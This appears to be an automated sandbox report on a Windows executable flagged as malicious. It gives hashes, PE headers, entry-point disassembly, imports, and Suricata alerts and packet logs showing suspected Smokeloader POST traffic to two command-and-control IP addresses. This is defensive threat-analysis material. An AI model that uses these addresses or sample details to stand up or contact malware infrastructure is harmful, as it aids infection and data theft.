SHA-256:	2C84B412D0AB9A058D88E5B34E0921C06DA1BA11703EF71C124050406DAD1844
SHA-512:	DD28FB4DCBBA20B72E7FB36C2D947A99A8DFFE76D52460D52143992AA98BF0C7EE41CFA9E59FB7D0A7CA3C598B0924254E9764168F5F8031F3BB920F60D562E5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z"TQ;L.Q;L.Q;L.>M..p;L.>M..w;L.>M..2;L.XC..V;L.Q;M..;L.>M..P;L.>M..P;L.>M..P;L.RichQ;L.................PE..L.....3d............................I7............@.............................................................................P........d..........................@...................................@............................................text............................... ..`.rdata..............................@..@.data...h........^..................@....rsrc....d.......f...>..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\sfjujsr:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.992143639446749
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	k8JAXb3Lhs.exe
File size:	369'664 bytes
MD5:	eead7a529f768cd0a74a639ff806357c
SHA1:	5fea9c1f649f81dfca7f19af1cabc8aab2b01829
SHA256:	2c84b412d0ab9a058d88e5b34e0921c06da1ba11703ef71c124050406dad1844
SHA512:	dd28fb4dcbba20b72e7fb36c2d947a99a8dffe76d52460d52143992aa98bf0c7ee41cfa9e59fb7d0a7ca3c598b0924254e9764168f5f8031f3bb920f60d562e5
SSDEEP:	6144:o1JYtwjCacpD0fbtNorAJoKURDOT42P12YO5LqxuGG8eskEGtwc:Ui2jCacpofbtNRJoSHbkGVGtw
TLSH:	32748E0353F13C56EB264A32CE2EC6E8761EF561AE1B377A32186A1F14F09B1C663715
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z"TQ;L.Q;L.Q;L.>M..p;L.>M..w;L.>M..2;L.XC..V;L.Q;M..;L.>M..P;L.>M..P;L.>M..P;L.RichQ;L.................PE..L.....3d...........

File Icon


Icon Hash:	512545415559510d

Static PE Info

General

Entrypoint:	0x403749
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6433F7E2 [Mon Apr 10 11:49:54 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ff383ac4deafd0aa2c692d1185588d4b

Entrypoint Preview

Instruction
call 00007F32B0836241h
jmp 00007F32B08328CEh
push dword ptr [00444FFCh]
call dword ptr [0040E118h]
test eax, eax
je 00007F32B0832A44h
call eax
push 00000019h
call 00007F32B08358DEh
push 00000001h
push 00000000h
call 00007F32B08335DCh
add esp, 0Ch
jmp 00007F32B08335A1h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040E3D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F32B0832A4Eh
test byte ptr [eax], 00000008h
je 00007F32B0832A49h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040E148h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3e4f0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x205a000	0x164a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3e540	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3dbc0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x1d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcbc4	0xcc00	94972da1bb4ddcc10d81f17166d186cd	False	0.6090303308823529	data	6.759932634611489	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x30f8e	0x31000	a7160c40f4b2a83dcb49729dcb3251fe	False	0.9356365593112245	data	7.862669112386082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3f000	0x201a268	0x5e00	b93d1710981d59197efeabe69c67207d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x205a000	0x164a0	0x16600	b1ce196108c965bda8576c5bc2bb9aa3	False	0.38988303072625696	data	4.436973677856284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x206c988	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x206cab8	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x206cb90	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x206da38	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x206e2e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_ICON	0x205a7e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3686034115138593
RT_ICON	0x205a7e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3686034115138593
RT_ICON	0x205b688	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.45577617328519854
RT_ICON	0x205b688	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.45577617328519854
RT_ICON	0x205bf30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.45622119815668205
RT_ICON	0x205bf30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.45622119815668205
RT_ICON	0x205c5f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.45809248554913296
RT_ICON	0x205c5f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.45809248554913296
RT_ICON	0x205cb60	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.2676348547717842
RT_ICON	0x205cb60	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.2676348547717842
RT_ICON	0x205f108	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.30605065666041276
RT_ICON	0x205f108	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.30605065666041276
RT_ICON	0x20601b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.350177304964539
RT_ICON	0x20601b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.350177304964539
RT_ICON	0x2060680	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.56636460554371
RT_ICON	0x2060680	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.56636460554371
RT_ICON	0x2061528	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5437725631768953
RT_ICON	0x2061528	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5437725631768953
RT_ICON	0x2061dd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.6141618497109826
RT_ICON	0x2061dd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.6141618497109826
RT_ICON	0x2062338	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.46307053941908716
RT_ICON	0x2062338	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.46307053941908716
RT_ICON	0x20648e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4871013133208255
RT_ICON	0x20648e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4871013133208255
RT_ICON	0x2065988	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.4954918032786885
RT_ICON	0x2065988	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.4954918032786885
RT_ICON	0x2066310	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.450354609929078
RT_ICON	0x2066310	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.450354609929078
RT_ICON	0x20667e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.4914712153518124
RT_ICON	0x20667e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.4914712153518124
RT_ICON	0x2067688	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.46705776173285196
RT_ICON	0x2067688	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.46705776173285196
RT_ICON	0x2067f30	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.4320809248554913
RT_ICON	0x2067f30	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.4320809248554913
RT_ICON	0x2068498	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.27593360995850624
RT_ICON	0x2068498	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.27593360995850624
RT_ICON	0x206aa40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.28775797373358347
RT_ICON	0x206aa40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.28775797373358347
RT_ICON	0x206bae8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.30450819672131146
RT_ICON	0x206bae8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.30450819672131146
RT_ICON	0x206c470	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.32890070921985815
RT_ICON	0x206c470	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.32890070921985815
RT_STRING	0x206ead8	0x796	data	Tamil	India	0.4129763130792997
RT_STRING	0x206ead8	0x796	data	Tamil	Sri Lanka	0.4129763130792997
RT_STRING	0x206f270	0x550	data	Tamil	India	0.44485294117647056
RT_STRING	0x206f270	0x550	data	Tamil	Sri Lanka	0.44485294117647056
RT_STRING	0x206f7c0	0x328	data	Tamil	India	0.4628712871287129
RT_STRING	0x206f7c0	0x328	data	Tamil	Sri Lanka	0.4628712871287129
RT_STRING	0x206fae8	0x6a0	data	Tamil	India	0.4257075471698113
RT_STRING	0x206fae8	0x6a0	data	Tamil	Sri Lanka	0.4257075471698113
RT_STRING	0x2070188	0x312	data	Tamil	India	0.4631043256997455
RT_STRING	0x2070188	0x312	data	Tamil	Sri Lanka	0.4631043256997455
RT_ACCELERATOR	0x206c940	0x48	data	Tamil	India	0.8472222222222222
RT_ACCELERATOR	0x206c940	0x48	data	Tamil	Sri Lanka	0.8472222222222222
RT_GROUP_CURSOR	0x206cb68	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x206e848	0x30	data			0.9375
RT_GROUP_ICON	0x2066778	0x68	data	Tamil	India	0.7019230769230769
RT_GROUP_ICON	0x2066778	0x68	data	Tamil	Sri Lanka	0.7019230769230769
RT_GROUP_ICON	0x2060618	0x68	data	Tamil	India	0.6826923076923077
RT_GROUP_ICON	0x2060618	0x68	data	Tamil	Sri Lanka	0.6826923076923077
RT_GROUP_ICON	0x206c8d8	0x68	data	Tamil	India	0.7211538461538461
RT_GROUP_ICON	0x206c8d8	0x68	data	Tamil	Sri Lanka	0.7211538461538461
RT_VERSION	0x206e878	0x25c	data			0.5413907284768212

Imports

DLL	Import
KERNEL32.dll	LocalCompact, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, InterlockedCompareExchange, SetVolumeMountPointW, GetTimeFormatA, _lcreat, GetModuleHandleW, SetFileTime, ClearCommBreak, GetConsoleAliasExesW, CreateActCtxW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoW, CreateEventA, GetFileAttributesW, VerifyVersionInfoA, GetModuleFileNameW, GetEnvironmentVariableA, GetTempPathW, InterlockedExchange, GlobalUnfix, GetStdHandle, GetLastError, GetProcAddress, CreateNamedPipeA, CommConfigDialogA, EnumSystemCodePagesW, SetComputerNameA, GlobalFree, GetTempFileNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, CreateHardLinkW, GetNumberFormatW, OpenEventA, QueryDosDeviceW, FoldStringA, SetEnvironmentVariableA, EnumDateFormatsA, GetCurrentDirectoryA, GetShortPathNameW, SetCalendarInfoA, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, GetVersionExA, ReadConsoleInputW, DebugBreak, SetFileAttributesW, LCMapStringW, GetLocaleInfoA, TlsGetValue, SetFilePointer, EnumCalendarInfoA, GetComputerNameA, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
GDI32.dll	GetCharWidthI, GetBkMode, CreateDCW, GetCharWidth32A, GetCharABCWidthsI
WINHTTP.dll	WinHttpCloseHandle

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T15:17:23.620395+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	78.89.199.216	80	TCP
2024-10-01T15:17:24.752008+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	78.89.199.216	80	TCP
2024-10-01T15:17:25.914811+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	78.89.199.216	80	TCP
2024-10-01T15:17:27.029533+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	78.89.199.216	80	TCP
2024-10-01T15:17:28.206437+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	78.89.199.216	80	TCP
2024-10-01T15:17:29.341890+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	78.89.199.216	80	TCP
2024-10-01T15:17:30.500449+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	78.89.199.216	80	TCP
2024-10-01T15:17:31.641582+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	78.89.199.216	80	TCP
2024-10-01T15:17:33.261390+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	78.89.199.216	80	TCP
2024-10-01T15:17:34.418617+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	78.89.199.216	80	TCP
2024-10-01T15:17:35.545596+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	78.89.199.216	80	TCP
2024-10-01T15:17:36.688527+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	78.89.199.216	80	TCP
2024-10-01T15:17:37.858454+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	78.89.199.216	80	TCP
2024-10-01T15:17:38.979866+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	78.89.199.216	80	TCP
2024-10-01T15:17:40.096823+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	78.89.199.216	80	TCP
2024-10-01T15:17:41.358376+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	78.89.199.216	80	TCP
2024-10-01T15:17:42.684467+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	78.89.199.216	80	TCP
2024-10-01T15:17:43.812303+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	78.89.199.216	80	TCP
2024-10-01T15:17:45.121736+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	78.89.199.216	80	TCP
2024-10-01T15:17:46.345239+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	78.89.199.216	80	TCP
2024-10-01T15:17:47.480934+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	78.89.199.216	80	TCP
2024-10-01T15:17:48.777574+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49757	78.89.199.216	80	TCP
2024-10-01T15:17:49.901493+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	78.89.199.216	80	TCP
2024-10-01T15:17:50.981956+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49759	78.89.199.216	80	TCP
2024-10-01T15:17:52.350953+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	78.89.199.216	80	TCP
2024-10-01T15:17:53.596376+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49761	78.89.199.216	80	TCP
2024-10-01T15:18:59.724566+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49763	78.89.199.216	80	TCP
2024-10-01T15:19:06.035186+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49764	78.89.199.216	80	TCP
2024-10-01T15:19:11.806618+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49765	78.89.199.216	80	TCP
2024-10-01T15:19:18.036708+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49766	78.89.199.216	80	TCP
2024-10-01T15:19:23.665761+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49767	78.89.199.216	80	TCP
2024-10-01T15:19:30.039822+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49768	78.89.199.216	80	TCP
2024-10-01T15:19:35.601803+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49769	78.89.199.216	80	TCP
2024-10-01T15:19:42.320909+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49770	78.89.199.216	80	TCP
2024-10-01T15:19:47.791066+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49771	78.89.199.216	80	TCP
2024-10-01T15:19:56.389866+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49772	187.131.253.169	80	TCP
2024-10-01T15:20:02.025493+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49773	187.131.253.169	80	TCP
2024-10-01T15:20:07.324998+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49774	187.131.253.169	80	TCP
2024-10-01T15:20:13.530972+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49775	187.131.253.169	80	TCP
2024-10-01T15:20:19.524009+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49776	187.131.253.169	80	TCP
2024-10-01T15:20:25.648095+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49777	187.131.253.169	80	TCP
2024-10-01T15:20:31.521429+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49778	187.131.253.169	80	TCP
2024-10-01T15:20:36.199335+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49779	187.131.253.169	80	TCP
2024-10-01T15:20:41.110917+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49780	187.131.253.169	80	TCP
2024-10-01T15:20:47.770977+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49781	187.131.253.169	80	TCP
2024-10-01T15:20:54.025223+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49782	187.131.253.169	80	TCP
2024-10-01T15:20:59.510649+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49783	187.131.253.169	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 15:17:22.445229053 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:22.451527119 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:22.451591969 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:22.451747894 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:22.451772928 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:22.456839085 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:22.456938028 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:23.620310068 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:23.620345116 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:23.620394945 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:23.622291088 CEST	49736	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:23.625282049 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:23.628797054 CEST	80	49736	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:23.631429911 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:23.631508112 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:23.632148027 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:23.632172108 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:23.638276100 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:23.638286114 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:24.751142979 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:24.751873016 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:24.752007961 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:24.752744913 CEST	49737	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:24.756525993 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:24.757467031 CEST	80	49737	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:24.761313915 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:24.764297009 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:24.764417887 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:24.764436007 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:24.769299030 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:24.769310951 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:25.914532900 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:25.914743900 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:25.914810896 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:25.914952040 CEST	49738	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:25.917706013 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:25.919837952 CEST	80	49738	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:25.922595978 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:25.922660112 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:25.922745943 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:25.922774076 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:25.927726030 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:25.927736044 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:27.029357910 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:27.029464960 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:27.029532909 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:27.029649973 CEST	49739	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:27.032167912 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:27.034401894 CEST	80	49739	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:27.037061930 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:27.037136078 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:27.037231922 CEST	49740	80	192.168.2.4	78.89.199.216
